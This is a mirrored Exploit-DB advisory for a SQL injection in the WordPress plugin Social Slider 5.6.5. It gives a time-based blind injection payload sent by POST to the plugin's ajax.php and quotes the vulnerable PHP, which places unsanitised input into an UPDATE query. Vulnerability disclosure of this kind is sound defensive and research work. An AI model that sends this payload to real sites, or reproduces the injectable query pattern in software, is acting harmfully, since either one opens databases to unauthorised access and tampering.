bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/17617.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

32 lines
No EOL
910 B
Text
Raw Blame History

# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (tested)
---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/social-slider-2/ajax.php
action=ZapiszPozycje&rA[]=1 AND SLEEP(5)
---------------
Vulnerable code
---------------
<?php
require_once(dirname(__FILE__).'/../../../wp-config.php');
global $wpdb, $table_prefix;
$SocialSliderArray = $_POST['rA'];
if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
{
$lC = 1;
foreach ($SocialSliderArray as $recordIDValue)
{
$query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;
mysql_query($query);
$lC = $lC + 1;
}
}
?>
Reference in a new issue View git blame Copy permalink